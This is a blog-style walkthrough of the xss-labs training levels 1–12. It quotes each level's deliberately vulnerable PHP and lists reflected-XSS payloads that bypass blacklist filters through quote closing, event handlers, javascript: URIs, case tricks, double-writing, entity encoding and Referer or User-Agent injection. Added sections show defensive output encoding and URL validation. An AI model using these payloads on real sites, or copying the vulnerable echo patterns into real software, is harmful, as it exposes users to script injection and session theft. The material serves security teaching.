Code audit learning XSS

Definition

Cross-site scripting is abbreviated XSS rather than CSS to avoid confusion with Cascading Style Sheets. XSS is a Web application vulnerability caused mainly by insufficient filtering of user input. A malicious attacker inserts script code into a Web page, and when a user browses that page the embedded script runs in the user's browser and can carry out various attacks against the victim, such as cookie theft, session hijacking, phishing and deception.

Less-1

```php
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>Welcome users".$str."</h2>";
?>
```

You can see in the source code that the value of $str comes from a GET parameter, and name is never filtered before it is echoed, which results in XSS injection.

Inject with a basic XSS payload.

Less-2

Here we need to close the leading double quote so that value="..." is closed early as value="" and the rest of the input lands outside the attribute value.

Analyze the source code:

```php
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="search"/>
</form>
</center>';
?>
```

The source code here also shows a GET request, but this time a filter is applied:

htmlspecialchars($str)

This filter converts predefined characters into HTML entities, so < cannot be used there.

Here we can also use a JavaScript event to trigger the popup:

" onclick=alert(1)

This requires one click on the input box. The trailing part can also be commented out with //.

less-3

```php
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=search />
</form>
</center>";
?>
```

There is not much difference from the previous level, but here the value output is also escaped, so the keyword can no longer carry < or >.

So we need to use a JavaScript event:

'onclick=alert(1)//

Here the attribute is closed with a single quotation mark.
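Why the single quote gets through, as an added example that is not part of the xss-labs code: before PHP 8.1 the default flags of htmlspecialchars() were ENT_COMPAT, which encodes " but leaves ' untouched, so a single-quoted attribute is only safe when the value is encoded with ENT_QUOTES. The function names below are my own.

```php
<?php
// Added example, not part of the xss-labs code: encoding for the attribute
// context. Level 3 wraps the value in single quotes and calls
// htmlspecialchars() with default flags; before PHP 8.1 the default was
// ENT_COMPAT, which encodes " but leaves ' alone, so the quote in the
// payload above closes the attribute.

// Legacy rendering, pinned to ENT_COMPAT so it behaves the same on any PHP version.
function renderLegacy(string $keyword): string
{
    return "<input name=keyword  value='" . htmlspecialchars($keyword, ENT_COMPAT) . "'>";
}

// Hardened rendering: encode both quote characters, substitute invalid UTF-8
// instead of returning an empty string, and always quote the attribute.
function attrEncode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderHardened(string $keyword): string
{
    return '<input name="keyword" value="' . attrEncode($keyword) . '">';
}

// Constructed input: the level-3 payload.
$payload = "'onclick=alert(1)//";

echo renderLegacy($payload), PHP_EOL;   // the quote survives and a new attribute starts
echo renderHardened($payload), PHP_EOL; // the quote is encoded; the whole payload stays text
```

The same attrEncode() applies to the double-quoted value attributes of the later levels; encoding for the output context is what replaces the blacklists that follow.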

less-4

Straight to the code:

```php
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=search />
</form>
</center>';
?>
```

A new call appears here:

str_replace(">","",$str)

This replaces > with an empty string; together with the htmlspecialchars($str) filter, a payload such as <script> no longer works.

So the popup can only be triggered through an event handler, and we use the same payload again:

"onclick=alert(1)//

less-5

Analyzing the code:

```php
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=search />
</form>
</center>';
?>
```

Nothing else has changed here, but the last two functions are used for filtering:

$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);

Therefore JavaScript event handlers cannot be used, and only a pseudo-protocol link remains.

There is one more function here, which lowercases the input so that case variation is no help:

$str = strtolower($_GET["keyword"]);

As before, close the value attribute first, otherwise htmlspecialchars would filter the <.

The payload is written as:

"><a href=JavaScript:alert(1)>nihao</a>

Clicking nihao then follows the link and fires the alert.

<iframe src="URL">

The same can also be achieved with this tag.

less-6

Analyzing the code:

```php
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=search />
</form>
</center>';
?>
```

Here we can see that the filter is basically the same as above, but the lowercase conversion is missing, so adding uppercase letters bypasses it.

There are many ways to write the payload here:

"> <Script>alert(1)</script> 

"> <img Src=x OnError=alert(1)> 

"><a HrEf="javascript:alert(1)">bmjoker</a>

"><svg x=" " Onclick=alert(1)>

"><ScriPt>alert(1)<sCrIpt>"

" OncliCk=alert(1) 

less-7

Look at the code:

```php
<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=search />
</form>
</center>';
?>
```

Looking at the code, there are many blacklisted words, which are replaced with an empty string; case is normalized and < is escaped, but we find that double writing is not prevented.

So we use a double-write bypass.

The payload is as follows:

"<scrscriptipt>alert(1)</scrscriptipt>

" oonnmouseover=alert(1)

"><a hrhrefef=javascriscriptpt:alert(1)>bmjoker</a>

" oonnclick=alert(1)//
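The level-7 blacklist reproduced as a function, plus the check a reviewer should run on any removal-based sanitizer: applying it twice must give the same result as applying it once. This is an added example, not code from xss-labs; level7Filter() and isIdempotent() are my own names.

```php
<?php
// Added example (not from the lab): the level-7 blacklist as a function,
// and an idempotency check. A single-pass removal filter can *create* the
// very token it removes, which is exactly what the double-write payloads
// above exploit. The remedy is output encoding, not a longer blacklist.

function level7Filter(string $str): string
{
    $str = strtolower($str);
    foreach (['script', 'on', 'src', 'data', 'href'] as $word) {
        $str = str_replace($word, '', $str);
    }
    return $str;
}

// A sanitizer is safe to rely on only if filter(filter(x)) === filter(x);
// otherwise its output still contains input it was meant to strip.
function isIdempotent(callable $filter, string $input): bool
{
    $once = $filter($input);
    return $filter($once) === $once;
}

// Constructed inputs mirroring the double-write payloads above.
$samples = [
    'plain',
    '<scrscriptipt>alert(1)</scrscriptipt>',
    '" oonnmouseover=alert(1)',
];

foreach ($samples as $s) {
    printf("%-40s -> %-32s idempotent: %s\n",
        $s, level7Filter($s), isIdempotent('level7Filter', $s) ? 'yes' : 'no');
}
```

Only the harmless first sample passes the check; for the other two, one pass of the filter assembles the blacklisted word and a second pass would remove it again.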

less-8

Look at the code:

```php
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=Add links />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">Links</a></center>';
?>
```

Analyzing the code: <script is converted to <scr_ipt, on to o_n, src to sr_c, data to da_ta and href to hr_ef.

Case tricks are also ineffective, and " is encoded as well, but the angle brackets < >, the single quotation mark ', %, # and & are not filtered. The output point is inside the href attribute of an a tag.

The double quotation mark in the attribute is converted to an HTML entity, so the attribute cannot be truncated. We can use the javascript: pseudo-protocol instead. Because the script keyword is filtered,

javascript would be replaced with javascr_ipt, so we use &#x72; in place of r. HTML character entity conversion: https://www.qqxiuzi.cn/bianma/zifushiti.php

payload:

javascrip&#x74;:alert(1)

javascript:%61lert(1)

javasc&#x72;ipt:alert`1`

javasc&#x0072;ipt:alert`1`

If the requested URL parameter contains %0d%0a, it is decoded to a carriage return and line feed when the string containing it is read in the servlet.

less-9

Analyzing the code:

```php
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=Add links />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="Your link is illegal? Is there any!">Links</a></center>';
}
else
{
  echo '<center><BR><a href="'.$str7.'">Links</a></center>';
}
?>
```

Most of it is unchanged, but a check for http:// is added here:

false===strpos($str7,'http://')

This checks whether the URL contains http://.

So our payload can be written as:

javascrip&#x74;:alert(1)//http://xxx.com   // using a comment

javascrip&#x74;:%0dhttp://xxx.com%0dalert(1)   // without a comment

javascrip&#x74;:%0ahttp://xxx.com%0dalert(1)   // without a comment
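What the level-9 check should have been, as an added example that is not part of xss-labs: a substring test for http:// says nothing about the scheme the browser will actually use, so the link is decoded the way the browser decodes it, stripped of the control characters browsers ignore, parsed, and accepted only with an http or https scheme. safeHref() is my own name; the sample links are constructed.

```php
<?php
// Added example (not from the lab): validating a user-supplied link before
// it is placed in href, instead of checking that "http://" occurs somewhere
// in the string.

// Returns the link ready for insertion into href="...", or null if it is
// not an absolute http(s) URL.
function safeHref(string $input): ?string
{
    // The browser decodes character references in the attribute before it
    // interprets the URL, so validate the decoded form (&#x74; -> t).
    $url = html_entity_decode($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    // Browsers ignore tab, CR and LF inside a URL and strip leading and
    // trailing C0 controls and spaces; remove them all so the scheme check
    // sees what the browser will see (this also defeats the %0d/%0a trick).
    $url = preg_replace('/[\x00-\x20\x7F]+/', '', $url);

    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // Encode for the attribute context on output.
    return htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: the level-9 payloads above plus legitimate links.
$links = [
    'http://example.com/page?a=1&b=2',
    'HTTPS://example.com/',
    'javascrip&#x74;:alert(1)//http://xxx.com',
    "javascrip&#x74;:\rhttp://xxx.com\ralert(1)",
    'http://xxx.com',
];

foreach ($links as $link) {
    $href = safeHref($link);
    echo json_encode($link), ' => ',
        $href === null ? 'rejected' : '<a href="' . $href . '">Links</a>', PHP_EOL;
}
```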

less-10

```php
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
```

Analyzing the code, two parameters are required, keyword and t_sort; angle brackets < > are replaced with empty strings, and there are three hidden input boxes.

<input name="t_sort"  value="'.$str33.'" type="hidden">

We need to build the payload around this line:

keyword=test&t_sort=" type="text" onclick="alert(1)

which produces:

<input name="t_sort" value="" type="text" onclick="alert(1)" type="hidden">

Two more payloads:

keyword=test&t_sort=" type="text" onmouseover="alert(1)

keyword=test&t_sort=" type="text" onmouseover=alert`1`

These are all based on JavaScript events.

less-11

Code:

```php
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
```

What is different here is that one more line is added:

$str11=$_SERVER['HTTP_REFERER'];

Because of this, we need to intercept the request to the page and send it to the server with a Referer header.

So we add the payload as:

Referer: " onmouseover=alert(1) type="text"   (no need to close alert here)

Referer: " onclick="alert(1) type="text"   (alert needs to be closed here)

You just need to add the payload to the request packet being sent.

less-12

The payload used in this level is:

User-Agent: " onmouseover=alert(1) type="text"

onclick doesn't seem to work here.

Reference: https://www.cnblogs.com/bmjoker/p/9446472.html


Keywords: security Web Security xss

Added by whizzykid on Sat, 05 Feb 2022 04:12:52 +0200